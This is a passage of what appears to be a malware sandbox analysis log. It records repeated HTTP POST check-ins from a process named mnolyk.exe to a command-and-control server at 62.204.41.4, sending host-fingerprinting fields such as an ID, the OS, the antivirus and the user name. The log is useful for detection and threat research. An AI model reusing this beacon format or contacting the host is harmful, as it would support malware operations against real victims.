                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.978040934 CET576INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        376192.168.2.55006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:29.146656990 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:29.211658955 CET577INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        377192.168.2.55006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:29.442348003 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:29.506154060 CET578INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        378192.168.2.55006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:29.946527004 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.012849092 CET579INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        379192.168.2.55006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:30.250801086 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.317364931 CET580INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        38192.168.2.54972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:43.785939932 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.092256069 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.158833027 CET239INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        380192.168.2.55007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:30.493721008 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.560586929 CET581INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        381192.168.2.55007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:31.256999969 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:31.321892023 CET582INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        382192.168.2.55007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:31.495682955 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:31.560380936 CET583INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        383192.168.2.55007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:32.799221992 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:32.869652987 CET584INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        384192.168.2.55007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.054157972 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.121211052 CET585INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        385192.168.2.55007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.288721085 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.352719069 CET586INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        386192.168.2.55007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.527817011 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.590672016 CET587INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        387192.168.2.55007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.758095980 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.822932005 CET588INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        388192.168.2.55007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.994127989 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.060539007 CET589INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        389192.168.2.55007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.225155115 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.289185047 CET590INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        39192.168.2.54972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:44.339848995 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.405359983 CET240INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        390192.168.2.55008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.462035894 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.524780989 CET591INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        391192.168.2.55008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.695568085 CET592OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.766392946 CET592INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        392192.168.2.55008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.947433949 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.014060974 CET593INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
